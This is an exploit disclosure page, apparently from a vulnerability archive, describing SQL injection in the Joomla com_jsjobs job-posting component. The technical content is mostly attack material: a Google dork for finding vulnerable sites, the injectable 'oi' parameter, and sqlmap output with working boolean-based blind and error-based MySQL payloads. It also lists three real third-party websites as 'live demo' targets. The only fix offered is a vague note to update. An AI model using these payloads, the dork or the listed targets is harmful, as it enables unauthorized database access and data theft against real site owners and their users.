Joomla com_jsjobs SQL injection Vulnerability

2016.08.31
mr xBADGIRL21 (MR) mr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! Exploit Title : Joomla com_jsjobs SQL injection Vulnerability !! Exploit Author : xBADGIRL21 !! Dork : inurl:index.php?option=com_jsjobs !! Vendor Homepage : http://www.joomsky.com !! MyBlog : http://xbadgirl21.blogspot.com/ !! version : 1.0.7.5 !! Tested on: [ BackBox] !! skype:xbadgirl21 !! Date: 31/08/2016 !! video Proof : https://youtu.be/ZBphlyFtNeo |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [★] DESCRIPTION : ✚ |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [+] Jsjobs is A component for job posting and resume submission. !! [+] AND an SQL injection has been Detected in this Joomla components jsjobs |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [★] Poc : !! |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [oi] Get Parameter Vulnerable To SQLi !! http://127.0.0.1/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680' |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [★] SQLmap PoC : ✚ |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! !! Parameter: oi (GET) !! [!] Type: boolean-based blind !! [!] Title: AND boolean-based blind - WHERE or HAVING clause !! [!] Payload: option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680 AND 3616=3616&Itemid=0&lang=en !! [!] !! [!] Type: error-based !! [!] Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) !! [!] Payload: option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680 AND (SELECT 2727 FROM(SELECT COUNT(*),CONCAT(0x7170716a71, !! [!] (SELECT (ELT(2727=2727,1))),0x71627a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=0&lang=en !!++++++++++++++++++++++ !! GET parameter 'oi' is vulnerable. Do you want to keep testing the others (if any)? [y/N] |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [★] Live Demo : ✚ |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! http://dev.selectmyjob.lu/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680&Itemid=0&lang=en !! http://job.gastrobaiter.com/index.php?option=com_jsjobs&c=jsjobs&view=jobseeker&layout=list_subcategoryjobs&jobsubcat=279&Itemid=55&sortby=salaryrangedesc !! http://www.cultunet.com/index.php?option=com_jsjobs&c=jsjobs&view=jobseeker&layout=job_searchresults&Itemid=1&sortby=companydesc&lang=es |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [★] Solution ✚ |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! Just Update to the Last Version {Test In Progress} |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [★] Discovered by : xBADGIRL21 !! [★] Greetz : All Mauritanien Hackers - NoWhere |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚

References:

https://youtu.be/ZBphlyFtNeo


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top